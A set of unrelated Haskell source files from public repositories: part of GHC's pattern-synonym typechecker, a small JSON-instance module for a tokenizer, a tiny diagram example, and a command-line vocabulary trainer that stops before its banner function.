-- Shared by both tcInferPatSyn and tcCheckPatSyn
-- | Zonk all the pieces, build the 'PatSyn' together with its matcher
-- binding and builder Id (tied with 'fixM', since the PatSyn mentions the
-- builder and vice versa), and extend the global env with record selectors.
tc_patsyn_finish :: Located Name      -- ^ PatSyn Name
                 -> HsPatSynDir Name  -- ^ PatSyn type (Uni/Bidir/ExplicitBidir)
                 -> Bool              -- ^ Whether infix
                 -> LPat Id           -- ^ Pattern of the PatSyn
                 -> ([TcTyVar], [PredType], TcEvBinds, [EvVar])
                 -> ([TcTyVar], [TcType], [PredType], TcEvBinds, [EvVar])
                 -> [(Var, HsWrapper)]  -- ^ Pattern arguments
                 -> TcType              -- ^ Pattern type
                 -> [Name]              -- ^ Selector names
                                        -- ^ Whether fields, empty if not record PatSyn
                 -> TcM (PatSyn, LHsBinds Id, TcGblEnv)
tc_patsyn_finish lname dir is_infix lpat'
                 (univ_tvs, req_theta, req_ev_binds, req_dicts)
                 (ex_tvs, subst, prov_theta, prov_ev_binds, prov_dicts)
                 wrapped_args
                 pat_ty field_labels
  = do { -- Zonk everything.  We are about to build a final PatSyn
         -- so there had better be no unification variables in there
         univ_tvs     <- mapM zonkQuantifiedTyVar univ_tvs
       ; ex_tvs       <- mapM zonkQuantifiedTyVar ex_tvs
       ; prov_theta   <- zonkTcThetaType prov_theta
       ; req_theta    <- zonkTcThetaType req_theta
       ; pat_ty       <- zonkTcType pat_ty
       ; wrapped_args <- mapM zonk_wrapped_arg wrapped_args
       ; let qtvs    = univ_tvs ++ ex_tvs
             -- See Note [Record PatSyn Desugaring]
             theta   = prov_theta ++ req_theta
             arg_tys = map (varType . fst) wrapped_args

       ; (patSyn, matcher_bind) <- fixM $ \ ~(patSyn,_) -> do {

         traceTc "tc_patsyn_finish {" $
            ppr (unLoc lname) $$ ppr (unLoc lpat') $$
            ppr (univ_tvs, req_theta, req_ev_binds, req_dicts) $$
            ppr (ex_tvs, subst, prov_theta, prov_ev_binds, prov_dicts) $$
            ppr wrapped_args $$
            ppr pat_ty

       -- Make the 'matcher'
       ; (matcher_id, matcher_bind) <- tcPatSynMatcher lname lpat'
                                         (univ_tvs, req_theta, req_ev_binds, req_dicts)
                                         (ex_tvs, subst, prov_theta, prov_ev_binds, prov_dicts)
                                         wrapped_args  -- Not necessarily zonked
                                         pat_ty

       -- Make the 'builder'
       ; builder_id <- mkPatSynBuilderId dir lname qtvs theta
                                         arg_tys pat_ty patSyn

        -- TODO: Make this have the proper information
       ; let mkFieldLabel name = FieldLabel (occNameFS (nameOccName name)) False name
             field_labels' = (map mkFieldLabel field_labels)

       -- Make the PatSyn itself
       ; let patSyn' = mkPatSyn (unLoc lname) is_infix
                        (univ_tvs, req_theta)
                        (ex_tvs, prov_theta)
                        arg_tys
                        pat_ty
                        matcher_id builder_id
                        field_labels'

       ; return (patSyn', matcher_bind) }

       -- Selectors
       ; let (sigs, selector_binds) =
               unzip (mkPatSynRecSelBinds patSyn (patSynFieldLabels patSyn))
       ; let tything = AConLike (PatSynCon patSyn)
       ; tcg_env <-
           tcExtendGlobalEnv [tything] $
           tcRecSelBinds
             (ValBindsOut (zip (repeat NonRecursive) selector_binds) sigs)

       ; return (patSyn, matcher_bind, tcg_env) }
  where
    zonk_wrapped_arg :: (Var, HsWrapper) -> TcM (Var, HsWrapper)
    -- The HsWrapper will get zonked later, as part of the LHsBinds
    zonk_wrapped_arg (arg_id, wrap) = do { arg_id <- zonkId arg_id
                                         ; return (arg_id, wrap) }
{-
************************************************************************
* *
Constructing the "matcher" Id and its binding
* *
************************************************************************
-}
-- | Build the matcher Id and its binding.  The matcher takes the
-- scrutinee, a success continuation (abstracted over the existentials,
-- provided dicts and pattern arguments) and a failure continuation; the
-- returned Bool says whether the continuations take a Void# dummy argument
-- (the case of no arguments and no provided dicts).
tcPatSynMatcher :: Located Name
                -> LPat Id
                -> ([TcTyVar], ThetaType, TcEvBinds, [EvVar])
                -> ([TcTyVar], [TcType], ThetaType, TcEvBinds, [EvVar])
                -> [(Var, HsWrapper)]
                -> TcType
                -> TcM ((Id, Bool), LHsBinds Id)
-- See Note [Matchers and builders for pattern synonyms] in PatSyn
tcPatSynMatcher (L loc name) lpat
                (univ_tvs, req_theta, req_ev_binds, req_dicts)
                (ex_tvs, ex_tys, prov_theta, prov_ev_binds, prov_dicts)
                wrapped_args pat_ty
  = do { uniq <- newUnique
       ; let tv_name = mkInternalName uniq (mkTyVarOcc "r") loc
             res_tv  = mkTcTyVar tv_name openTypeKind (SkolemTv False)
             is_unlifted = null wrapped_args && null prov_dicts
             res_ty = mkTyVarTy res_tv
             (cont_arg_tys, cont_args)
               | is_unlifted = ([voidPrimTy], [nlHsVar voidPrimId])
               | otherwise   = unzip [ (varType arg, mkLHsWrap wrap $ nlHsVar arg)
                                     | (arg, wrap) <- wrapped_args
                                     ]
             cont_ty = mkSigmaTy ex_tvs prov_theta $
                       mkFunTys cont_arg_tys res_ty

             fail_ty = mkFunTy voidPrimTy res_ty

       ; matcher_name <- newImplicitBinder name mkMatcherOcc
       ; scrutinee <- newSysLocalId (fsLit "scrut") pat_ty
       ; cont <- newSysLocalId (fsLit "cont") cont_ty
       ; fail <- newSysLocalId (fsLit "fail") fail_ty

       ; let matcher_tau   = mkFunTys [pat_ty, cont_ty, fail_ty] res_ty
             matcher_sigma = mkSigmaTy (res_tv:univ_tvs) req_theta matcher_tau
             matcher_id    = mkExportedLocalId PatSynId matcher_name matcher_sigma
                             -- See Note [Exported LocalIds] in Id

             cont_dicts = map nlHsVar prov_dicts
             cont' = mkLHsWrap (mkWpLet prov_ev_binds) $
                     nlHsTyApps cont ex_tys (cont_dicts ++ cont_args)

             fail' = nlHsApps fail [nlHsVar voidPrimId]

             args = map nlVarPat [scrutinee, cont, fail]
             lwpat = noLoc $ WildPat pat_ty
             -- An irrefutable pattern needs no fallthrough alternative.
             cases = if isIrrefutableHsPat lpat
                     then [mkSimpleHsAlt lpat  cont']
                     else [mkSimpleHsAlt lpat  cont',
                           mkSimpleHsAlt lwpat fail']
             body = mkLHsWrap (mkWpLet req_ev_binds) $
                    L (getLoc lpat) $
                    HsCase (nlHsVar scrutinee) $
                    MG{ mg_alts = cases
                      , mg_arg_tys = [pat_ty]
                      , mg_res_ty = res_ty
                      , mg_origin = Generated
                      }
             body' = noLoc $
                     HsLam $
                     MG{ mg_alts = [mkSimpleMatch args body]
                       , mg_arg_tys = [pat_ty, cont_ty, res_ty]
                       , mg_res_ty = res_ty
                       , mg_origin = Generated
                       }
             match = mkMatch [] (mkHsLams (res_tv:univ_tvs) req_dicts body') EmptyLocalBinds
             mg = MG{ mg_alts = [match]
                    , mg_arg_tys = []
                    , mg_res_ty = res_ty
                    , mg_origin = Generated
                    }

       ; let bind = FunBind{ fun_id = L loc matcher_id
                           , fun_infix = False
                           , fun_matches = mg
                           , fun_co_fn = idHsWrapper
                           , bind_fvs = emptyNameSet
                           , fun_tick = [] }
             matcher_bind = unitBag (noLoc bind)

       ; traceTc "tcPatSynMatcher" (ppr name $$ ppr (idType matcher_id))
       ; traceTc "tcPatSynMatcher" (ppr matcher_bind)

       ; return ((matcher_id, is_unlifted), matcher_bind) }
-- | One record-selector binding (signature plus bind group) per visible
-- field label of a record pattern synonym.
mkPatSynRecSelBinds :: PatSyn
                    -> [FieldLabel]
                    -- ^ Visible field labels
                    -> [(LSig Name, LHsBinds Name)]
mkPatSynRecSelBinds ps = map selectorFor
  where
    selectorFor lbl =
      case mkOneRecordSelector [PatSynCon ps] (RecSelPatSyn ps) lbl of
        -- Drop the RecFlag; only the signature and the binds are needed.
        (sig, (_rec_flag, binds)) -> (sig, binds)
-- | True only for 'Unidirectional' pattern synonyms, i.e. those without a
-- builder and hence unusable in expression position.
isUnidirectional :: HsPatSynDir a -> Bool
isUnidirectional dir =
  case dir of
    Unidirectional          -> True
    ImplicitBidirectional   -> False
    ExplicitBidirectional{} -> False
{-
************************************************************************
* *
Constructing the "builder" Id
* *
************************************************************************
-}
-- | Make the builder Id for a pattern synonym; 'Nothing' for a
-- unidirectional one.  The returned Bool records whether the builder needs
-- an extra Void# dummy argument: a nullary builder of unlifted type cannot
-- be a plain top-level value.
mkPatSynBuilderId :: HsPatSynDir a -> Located Name
                  -> [TyVar] -> ThetaType -> [Type] -> Type -> PatSyn
                  -> TcM (Maybe (Id, Bool))
mkPatSynBuilderId dir (L _ name) qtvs theta arg_tys pat_ty pat_syn
  | isUnidirectional dir
  = return Nothing
  | otherwise
  = do { builder_name <- newImplicitBinder name mkBuilderOcc
       ; let builder_sigma = mkSigmaTy qtvs theta (mkFunTys builder_arg_tys pat_ty)
             builder_id =
               -- See Note [Exported LocalIds] in Id
               mkExportedLocalId (PatSynBuilderId pat_syn)
                                 builder_name builder_sigma
       ; return (Just (builder_id, need_dummy_arg)) }
  where
    builder_arg_tys | need_dummy_arg = [voidPrimTy]
                    | otherwise = arg_tys
    need_dummy_arg = isUnLiftedType pat_ty && null arg_tys && null theta
-- | Typecheck the binding for a pattern synonym's builder.  For an
-- implicitly bidirectional synonym the RHS expression is obtained by
-- inverting the pattern with 'tcPatToExpr'; failure to invert is an error.
-- Unidirectional synonyms yield no binding at all.
tcPatSynBuilderBind :: PatSynBind Name Name
                    -> TcM (LHsBinds Id)
-- See Note [Matchers and builders for pattern synonyms] in PatSyn
tcPatSynBuilderBind PSB{ psb_id = L loc name, psb_def = lpat
                       , psb_dir = dir, psb_args = details }
  | isUnidirectional dir
  = return emptyBag

  | isNothing mb_match_group       -- Can't invert the pattern
  = setSrcSpan (getLoc lpat) $ failWithTc $
    hang (ptext (sLit "Right-hand side of bidirectional pattern synonym cannot be used as an expression"))
       2 (ppr lpat)

  | otherwise  -- Bidirectional
  = do { patsyn <- tcLookupPatSyn name
       ; let Just (builder_id, need_dummy_arg) = patSynBuilder patsyn
                   -- Bidirectional, so patSynBuilder returns Just

             match_group' | need_dummy_arg = add_dummy_arg match_group
                          | otherwise      = match_group

             bind = FunBind { fun_id = L loc (idName builder_id)
                            , fun_infix = False
                            , fun_matches = match_group'
                            , fun_co_fn = idHsWrapper
                            , bind_fvs = placeHolderNamesTc
                            , fun_tick = [] }

       ; sig <- instTcTySigFromId builder_id
                -- See Note [Redundant constraints for builder]

       ; (builder_binds, _) <- tcPolyCheck NonRecursive emptyPragEnv sig (noLoc bind)
       ; traceTc "tcPatSynBuilderBind }" $ ppr builder_binds
       ; return builder_binds }
  where
    Just match_group = mb_match_group
    mb_match_group
      = case dir of
          Unidirectional                   -> Nothing
          ExplicitBidirectional explicit_mg -> Just explicit_mg
          ImplicitBidirectional            -> fmap mk_mg (tcPatToExpr args lpat)

    mk_mg :: LHsExpr Name -> MatchGroup Name (LHsExpr Name)
    mk_mg body = mkMatchGroupName Generated [builder_match]
      where
        builder_args  = [L loc (VarPat n) | L loc n <- args]
        builder_match = mkMatch builder_args body EmptyLocalBinds

    args = case details of
             PrefixPatSyn args     -> args
             InfixPatSyn arg1 arg2 -> [arg1, arg2]
             RecordPatSyn args     -> map recordPatSynPatVar args

    -- An unlifted nullary builder takes a Void# dummy; see mkPatSynBuilderId.
    add_dummy_arg :: MatchGroup Name (LHsExpr Name) -> MatchGroup Name (LHsExpr Name)
    add_dummy_arg mg@(MG { mg_alts = [L loc (Match Nothing [] ty grhss)] })
      = mg { mg_alts = [L loc (Match Nothing [nlWildPatName] ty grhss)] }
    add_dummy_arg other_mg = pprPanic "add_dummy_arg" $
                             pprMatches (PatSyn :: HsMatchContext Name) other_mg
-- | Typecheck an occurrence of a pattern synonym in expression position:
-- instantiate its builder (applying the Void# dummy argument if one is
-- needed), or fail for a unidirectional synonym.
tcPatSynBuilderOcc :: CtOrigin -> PatSyn -> TcM (HsExpr TcId, TcRhoType)
-- The result type should be fully instantiated
tcPatSynBuilderOcc orig ps
  | Just (builder_id, add_void_arg) <- builder
  = do { (wrap, rho) <- deeplyInstantiate orig (idType builder_id)
       ; let inst_fun = mkHsWrap wrap (HsVar builder_id)
       ; if add_void_arg
         then return ( HsApp (noLoc inst_fun) (nlHsVar voidPrimId)
                     , tcFunResultTy rho )
         else return ( inst_fun, rho ) }

  | otherwise  -- Unidirectional
  = nonBidirectionalErr name
  where
    name    = patSynName ps
    builder = patSynBuilder ps
{-
Note [Redundant constraints for builder]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The builder can have redundant constraints, which are awkward to eliminate.
Consider
pattern P = Just 34
To match against this pattern we need (Eq a, Num a). But to build
(Just 34) we need only (Num a). Fortunately instTcSigFromId sets
sig_warn_redundant to False.
************************************************************************
* *
Helper functions
* *
************************************************************************
Note [As-patterns in pattern synonym definitions]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The rationale for rejecting as-patterns in pattern synonym definitions
is that an as-pattern would introduce nonindependent pattern synonym
arguments, e.g. given a pattern synonym like:
pattern K x y = x@(Just y)
one could write a nonsensical function like
f (K Nothing x) = ...
or
g (K (Just True) False) = ...
Note [Type signatures and the builder expression]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Consider
pattern L x = Left x :: Either [a] [b]
In tc{Infer/Check}PatSynDecl we will check that the pattern has the
specified type. We check the pattern *as a pattern*, so the type
signature is a pattern signature, and so brings 'a' and 'b' into
scope. But we don't have a way to bind 'a, b' in the LHS, as we do
'x', say. Nevertheless, the signature may be useful to constrain
the type.
When making the binding for the *builder*, though, we don't want
$buildL x = Left x :: Either [a] [b]
because that will either mean (forall a b. Either [a] [b]), or we'll
get a complaint that 'a' and 'b' are out of scope. (Actually the
latter; Trac #9867.) No, the job of the signature is done, so when
converting the pattern to an expression (for the builder RHS) we
simply discard the signature.
Note [Record PatSyn Desugaring]
-------------------------------
It is important that prov_theta comes before req_theta as this ordering is used
when desugaring record pattern synonym updates.
Any change to this ordering should make sure to change deSugar/DsExpr.hs if you
want to avoid difficult to decipher core lint errors!
-}
-- | Walk the definition pattern and reject forms that may not appear in a
-- pattern synonym: as-patterns (see Note [As-patterns in pattern synonym
-- definitions]), Template Haskell splices, and n+k patterns.
tcCheckPatSynPat :: LPat Name -> TcM ()
tcCheckPatSynPat = go
  where
    go :: LPat Name -> TcM ()
    go = addLocM go1

    go1 :: Pat Name -> TcM ()
    go1   (ConPatIn _ info)   = mapM_ go (hsConPatArgs info)
    go1   VarPat{}            = return ()
    go1   WildPat{}           = return ()
    go1 p@(AsPat _ _)         = asPatInPatSynErr p
    go1   (LazyPat pat)       = go pat
    go1   (ParPat pat)        = go pat
    go1   (BangPat pat)       = go pat
    go1   (PArrPat pats _)    = mapM_ go pats
    go1   (ListPat pats _ _)  = mapM_ go pats
    go1   (TuplePat pats _ _) = mapM_ go pats
    go1   LitPat{}            = return ()
    go1   NPat{}              = return ()
    go1   (SigPatIn pat _)    = go pat
    go1   (ViewPat _ pat _)   = go pat
    go1 p@SplicePat{}         = thInPatSynErr p
    go1 p@NPlusKPat{}         = nPlusKPatInPatSynErr p
    -- The remaining constructors only exist after typechecking.
    go1   ConPatOut{}         = panic "ConPatOut in output of renamer"
    go1   SigPatOut{}         = panic "SigPatOut in output of renamer"
    go1   CoPat{}             = panic "CoPat in output of renamer"
-- | Fail with a message of the form "<reason>:" hanging over the offending
-- pattern.  Shared by the three pattern-rejection errors below.
badPatSynPat :: OutputableBndr name => String -> Pat name -> TcM a
badPatSynPat reason pat =
  failWithTc $ hang (ptext (sLit reason)) 2 (ppr pat)

-- | As-patterns are rejected; see Note [As-patterns in pattern synonym
-- definitions].
asPatInPatSynErr :: OutputableBndr name => Pat name -> TcM a
asPatInPatSynErr =
  badPatSynPat "Pattern synonym definition cannot contain as-patterns (@):"

-- | Template Haskell splices are rejected in pattern synonym definitions.
thInPatSynErr :: OutputableBndr name => Pat name -> TcM a
thInPatSynErr =
  badPatSynPat "Pattern synonym definition cannot contain Template Haskell:"

-- | n+k patterns are rejected in pattern synonym definitions.
nPlusKPatInPatSynErr :: OutputableBndr name => Pat name -> TcM a
nPlusKPatInPatSynErr =
  badPatSynPat "Pattern synonym definition cannot contain n+k-pattern:"

-- | Error for using a unidirectional pattern synonym in an expression.
nonBidirectionalErr :: Outputable name => name -> TcM a
nonBidirectionalErr name = failWithTc $
  ptext (sLit "non-bidirectional pattern synonym")
    <+> quotes (ppr name) <+> ptext (sLit "used in an expression")
-- | Invert a pattern into the corresponding expression, for the implicit
-- builder of a bidirectional pattern synonym.  Returns 'Nothing' for
-- pattern forms with no expression counterpart (wildcards, views, etc.)
-- or for variables that are not pattern-synonym arguments.
tcPatToExpr :: [Located Name] -> LPat Name -> Maybe (LHsExpr Name)
tcPatToExpr args = go
  where
    lhsVars = mkNameSet (map unLoc args)

    go :: LPat Name -> Maybe (LHsExpr Name)
    go (L loc (ConPatIn (L _ con) info))
      = do { exprs <- mapM go (hsConPatArgs info)
           ; return $ L loc $
             foldl (\x y -> HsApp (L loc x) y) (HsVar con) exprs }

    go (L _ (SigPatIn pat _)) = go pat
        -- See Note [Type signatures and the builder expression]

    go (L loc p) = fmap (L loc) $ go1 p

    go1 :: Pat Name -> Maybe (HsExpr Name)
    go1   (VarPat var)
      | var `elemNameSet` lhsVars  = return $ HsVar var
      | otherwise                  = Nothing
    go1   (LazyPat pat)            = fmap HsPar $ go pat
    go1   (ParPat pat)             = fmap HsPar $ go pat
    go1   (BangPat pat)            = fmap HsPar $ go pat
    go1   (PArrPat pats ptt)       = do { exprs <- mapM go pats
                                        ; return $ ExplicitPArr ptt exprs }
    go1   (ListPat pats ptt reb)   = do { exprs <- mapM go pats
                                        ; return $ ExplicitList ptt (fmap snd reb) exprs }
    go1   (TuplePat pats box _)    = do { exprs <- mapM go pats
                                        ; return $ ExplicitTuple
                                             (map (noLoc . Present) exprs) box }
    go1   (LitPat lit)             = return $ HsLit lit
    go1   (NPat (L _ n) Nothing _) = return $ HsOverLit n
    go1   (NPat (L _ n) (Just neg) _) = return $ noLoc neg `HsApp` noLoc (HsOverLit n)
    go1   (ConPatOut{})            = panic "ConPatOut in output of renamer"
    go1   (SigPatOut{})            = panic "SigPatOut in output of renamer"
    go1   (CoPat{})                = panic "CoPat in output of renamer"
    go1   _                        = Nothing
-- Walk the whole pattern and for all ConPatOuts, collect the
-- existentially-bound type variables and evidence binding variables.
--
-- These are used in computing the type of a pattern synonym and also
-- in generating matcher functions, since success continuations need
-- to be passed these pattern-bound evidences.
-- | Collect, from all ConPatOuts in a typechecked pattern, the
-- existentially-bound type variables and the evidence variables bound by
-- the pattern (see the comment above for why).
tcCollectEx :: LPat Id -> TcM (TyVarSet, [EvVar])
tcCollectEx = return . go
  where
    go :: LPat Id -> (TyVarSet, [EvVar])
    go = go1 . unLoc

    go1 :: Pat Id -> (TyVarSet, [EvVar])
    go1 (LazyPat p)         = go p
    go1 (AsPat _ p)         = go p
    go1 (ParPat p)          = go p
    go1 (BangPat p)         = go p
    go1 (ListPat ps _ _)    = mconcat . map go $ ps
    go1 (TuplePat ps _ _)   = mconcat . map go $ ps
    go1 (PArrPat ps _)      = mconcat . map go $ ps
    go1 (ViewPat _ p _)     = go p
    go1 con@ConPatOut{}     = mappend (mkVarSet (pat_tvs con), pat_dicts con) $
                              goConDetails $ pat_args con
    go1 (SigPatOut p _)     = go p
    go1 (CoPat _ p _)       = go1 p
    go1 (NPlusKPat n k geq subtract)
      = pprPanic "TODO: NPlusKPat" $ ppr n $$ ppr k $$ ppr geq $$ ppr subtract
    go1 _                   = mempty

    goConDetails :: HsConPatDetails Id -> (TyVarSet, [EvVar])
    goConDetails (PrefixCon ps) = mconcat . map go $ ps
    goConDetails (InfixCon p1 p2) = go p1 `mappend` go p2
    goConDetails (RecCon HsRecFields{ rec_flds = flds })
      = mconcat . map goRecFd $ flds

    goRecFd :: LHsRecField Id (LPat Id) -> (TyVarSet, [EvVar])
    goRecFd (L _ HsRecField{ hsRecFieldArg = p }) = go p
| AlexanderPankiv/ghc | compiler/typecheck/TcPatSyn.hs | bsd-3-clause | 28,128 | 0 | 20 | 9,447 | 6,490 | 3,375 | 3,115 | 444 | 19 |
{-# LANGUAGE OverloadedStrings #-}
-- | This just defines Token and TokenType as instances of ToJSON.
module Text.Bakers12.Tokenizer.JSON
() where
import Data.Aeson (ToJSON(..), object, (.=))
import Text.Bakers12.Tokenizer.Types (Token(..), TokenType(..))
-- | A 'Token' serializes to a JSON object with one key per field.
instance ToJSON Token where
    toJSON (Token txt rawTxt tokLen tokType tokSrc tokOffset) = object
        [ "text"   .= txt
        , "raw"    .= rawTxt
        , "length" .= tokLen
        , "type"   .= tokType
        , "source" .= tokSrc
        , "offset" .= tokOffset
        ]

-- | A 'TokenType' serializes as the string produced by its 'Show'
-- instance.
instance ToJSON TokenType where
    toJSON = toJSON . show
| erochest/bakers12 | lib/Text/Bakers12/Tokenizer/JSON.hs | bsd-3-clause | 617 | 0 | 8 | 200 | 152 | 91 | 61 | 15 | 0 |
-- How to String the Wreath Lamps
-- ==============================
--
-- See the comments in `Walk.lhs`.
--
-- Run the program with `dist/build/lampWalk/lampWalk -o lampWalk.svg -w 400`
-- where `-o` sets the output filename, and `-w` sets the diagram width.
import Wreath.Walk (lampWalkMain)
main = lampWalkMain
| bobgru/wreath | examples/lampWalk.hs | bsd-3-clause | 319 | 0 | 5 | 51 | 23 | 16 | 7 | 2 | 1 |
module Main (main) where
import VocabularyData
import Database
import FreqTable
import Trainer
import Control.Exception (bracket)
import Control.Lens
import Control.Monad.Trans.State
import Data.Acid
import Data.Maybe (listToMaybe)
import Data.Char (toUpper)
import System.Exit (exitSuccess)
import System.IO (hFlush, stdout)
-- | Program entry point: show the banner, ask for source and target
-- languages, then open the acid-state database and enter the command
-- loop.  'bracket' guarantees the database is closed on exit.
main :: IO ()
main = do
  showHeadline
  let test = initTestState
  lang <- getSourceOrTarget "from"
  test' <- execStateT (source.=lang) test
  lang' <- getSourceOrTarget "to"
  test'' <- execStateT (target.=lang') test'
  bracket (openLocalState emptyLearntList)
          (closeAcidState)
          (\db -> command db test'')
-- | Show the prompt banner, read one line from the user and dispatch
-- it via 'control'.
command :: AcidState LearntList -> TestState -> IO ()
command db test = do putStrLn "+===================================================+"
                     putStrLn "|                                                   |"
                     putStrLn "| what to do next? (type: \"help\" for help screen)   |"
                     putStrLn "| \"enter\" asks for the next vocabulary.             |"
                     putStrLn "|                                                   |"
                     putStrLn "+===================================================+\n"
                     cmd <- getLine
                     control db test cmd
-- | Interpret one user command.  The empty string is a shortcut for
-- \"next\"; anything unrecognised prints an error and re-prompts.
control :: AcidState LearntList -> TestState -> String -> IO ()
control db test "" = control db test "next"
control db test "help" = do print_help
                            command db test
control db test "next" = do len <- query db LengthVocabulary
                            if (len <=0)
                              then do putStrLn "No vocabulary in list."
                                      putStrLn "Use \"add word\" to insert."
                                      command db test
                              else do idx <- randomListIndex (fromIntegral len)
                                      f <- query db (LookupFrequency idx)
                                      -- frequencies are 1-based, the table 0-based
                                      test' <- execStateT (currentWord.=freqTable!!(f-1)) test
                                      -- debug output (disabled):
                                      -- putStrLn $ "vocabulary list len: "++show len
                                      -- putStrLn $ "random index: "++show idx
                                      -- print test'
                                      guess db test'
control db test "change source" = do lang <- getSourceOrTarget "from"
                                     test' <- execStateT (source.=lang) test
                                     -- print test'
                                     command db test'
control db test "change target" = do lang <- getSourceOrTarget "to"
                                     test' <- execStateT (target.=lang) test
                                     -- print test'
                                     command db test'
-- Matches "add word" optionally followed by a repetition count,
-- e.g. "add word 5".
control db test ('a':'d':'d':' ':'w':'o':'r':'d':xs) =
  do let times = maybeRead xs :: Maybe Int
     _repeat db test times
control db test "clear all" = do putStrLn "Are you sure to delete all learnt vocabularies?"
                                 putStrLn "Type \"yes\" or \"no\" to confirm."
                                 yesNo <- getLine
                                 yesNoElse db test yesNo
control db _ "exit" = do closeAcidState db
                         exitSuccess
control db test "print db" = do frqKnowList <- query db ViewAllVocabulary
                                print frqKnowList
                                command db test
control db test _ = do putStrLn "Invalid Input"
                       command db test
-- | Quiz the user on the current word.  A correct first try earns +5
-- knowledge; a correct answer after a hint earns +3; a wrong answer
-- after a hint costs 2.  A wrong first try shows the hint and asks
-- again.  The knowledge score is keyed by the word's frequency rank.
guess :: AcidState LearntList -> TestState -> IO ()
guess db test = do putStr $ "What is ("++show (test^.source)++"): "
                   putStrLn $ vocab (test^.currentWord) (test^.source)
                   putStr $ "Your answer ("++show (test^.target)++") is: "
                   -- flush so the prompt appears before getLine blocks
                   hFlush stdout
                   answer <- getLine
                   let is_hinted = (test^.hinted)
                       is_correct = correct (test^.currentWord) (test^.target) answer
                       f = test^.currentWord.frq
                   if is_hinted
                     then if is_correct
                            then do _ <- update db (UpdateKnowledge f 3)
                                    putStrLn "Correct, +3 Knowledge!"
                                    putStr "Full Answer: "
                                    putStrLn (vocab (test^.currentWord) (test^.target))
                                    putStr "Translated Hint: "
                                    putStrLn (hint (test^.currentWord) (test^.target))
                                    test' <- execStateT (hinted.=False) test
                                    command db test'
                            else do _ <- update db (UpdateKnowledge f (-2))
                                    putStrLn "Wrong, -2 Knowledge!"
                                    putStr "Correct Answer: "
                                    putStrLn (vocab (test^.currentWord) (test^.target))
                                    putStr "Translated Hint: "
                                    putStrLn (hint (test^.currentWord) (test^.target))
                                    test' <- execStateT (hinted.=False) test
                                    command db test'
                     else if is_correct
                            then do _ <- update db (UpdateKnowledge f 5)
                                    putStrLn "Correct, +5 Knowledge!"
                                    putStr "Full Answer: "
                                    putStrLn (vocab (test^.currentWord) (test^.target))
                                    command db test
                            else do test' <- execStateT (hinted.=True) test
                                    putStr "Hint: "
                                    putStrLn (hint (test'^.currentWord) (test'^.source))
                                    guess db test'
-- | Add a vocabulary @n@ times ('Just' n, clamped to at least zero) or
-- exactly once ('Nothing'), then return to the command prompt.
_repeat :: AcidState LearntList -> TestState -> Maybe Int -> IO ()
_repeat db test (Just n)| n<=0 = command db test
                        | otherwise = do _ <- update db AddVocabulary
                                         _repeat db test (Just (n-1))
_repeat db test Nothing = do _ <- update db AddVocabulary
                             command db test
-- | Interpret the user's confirmation answer for clearing the
-- database: \"yes\" wipes it, \"no\" aborts, anything else re-asks.
yesNoElse :: AcidState LearntList -> TestState -> String -> IO ()
yesNoElse db test answer =
  case answer of
    "yes" -> do _ <- update db ClearVocabulary
                command db test
    "no"  -> command db test
    _     -> control db test "clear all"
-- | Print the help screen (an \"HELP\" ASCII-art column on the left,
-- one command description per row on the right).
print_help :: IO ()
print_help = do putStrLn ""
                putStr "|  |_|  |" ; putStrLn "help          -> prints this text"
                putStr "|  | |  |" ; putStrLn ""
                putStr "|   _   |" ; putStrLn "next          -> next random vocabulary"
                putStr "|  |_   |" ; putStrLn "add word      -> adds a new vocabulary to the list of learnt words"
                putStr "|  |_   |" ; putStrLn "clear all     -> clears all vocabulary from the list of learnt words"
                putStr "|       |" ; putStrLn ""
                putStr "|  |    |" ; putStrLn "change source -> changes the source language"
                putStr "|  |_   |" ; putStrLn "change target -> changes the target language"
                putStr "|   _   |" ; putStrLn ""
                putStr "|  |_|  |" ; putStrLn "print db      -> prints the database"
                putStr "|  |    |" ; putStrLn "exit          -> guess what \"exits the program\""
                -- putStrLn "print test   -> prints the current test"
-- | Initial interactive state: first frequency-table entry as the
-- current word, translating French -> German, no hint shown yet.
initTestState :: TestState
initTestState = TestState { _currentWord = freqTable!!0
                          , _source = F
                          , _target = D
                          , _hinted = False }
-- | List the language codes the user may type when choosing a
-- source or target language.
langOptions :: IO ()
langOptions = mapM_ putStrLn
    [ "\tF/f for Français/French/Französisch"
    , "\tD/d for Allemande/German/Deutsch"
    , "\tE/e for Anglais/English/Englisch"
    ]
-- | Ask the user to pick a language; @toOrFrom@ is interpolated into
-- the prompt (\"from\" or \"to\").  Only the first character of the
-- answer is significant (case-insensitive); invalid input re-prompts.
getSourceOrTarget :: String -> IO Language
getSourceOrTarget toOrFrom = do
  putStrLn $ "Which language do you want to translate "++toOrFrom++"?"
  langOptions
  lang <- getLine
  case (maybeRead . map toUpper . take 1) lang of Just l -> return l
                                                  Nothing -> do putStrLn "Invalid Input"
                                                                getSourceOrTarget toOrFrom
-- | Total variant of 'read': 'Just' the first successful parse, or
-- 'Nothing' when the input does not parse at all.
maybeRead :: Read a => String -> Maybe a
maybeRead str = case reads str of
    ((value, _) : _) -> Just value
    []               -> Nothing
-- | Example sentence for the word in the given language (shown as a
-- hint after a wrong answer).
hint :: Word -> Language -> String
hint w F = w^.phrase
hint w D = w^.satz
hint w E = w^.sentence
-- | The word itself in the given language.
vocab :: Word-> Language -> String
vocab w F = w^.fra
vocab w D = w^.deu
vocab w E = w^.eng
-- | Check an answer: the stored translation is split into alternatives
-- (separators become spaces via 'subst', then underscores inside an
-- alternative become spaces via 'subst2') and the answer must match
-- one alternative exactly.
correct :: Word-> Language -> String -> Bool
correct w F str = elem str $ (subst2 . words . subst) (w^.fra)
correct w D str = elem str $ (subst2 . words . subst) (w^.deu)
correct w E str = elem str $ (subst2 . words . subst) (w^.eng)
-- | Replace the separator punctuation @;@, @.@, @,@ and @/@ with
-- spaces, so a stored translation can be split into alternatives
-- with 'words'.
subst :: String -> String
subst = map replaceSep
  where
    replaceSep :: Char -> Char
    replaceSep c
      | c `elem` ";.,/" = ' '
      | otherwise       = c
-- | Turn the underscores inside each alternative back into spaces
-- (underscores stand for spaces that must survive the 'words' split).
subst2 :: [String] -> [String]
subst2 = map (map underscoreToSpace)
  where
    underscoreToSpace :: Char -> Char
    underscoreToSpace '_' = ' '
    underscoreToSpace c   = c
-- | Print the ASCII-art \"VOCABU LAMBDA\" start-up banner.
-- NB: the strings are escape-heavy; each @\\\\@ prints one backslash.
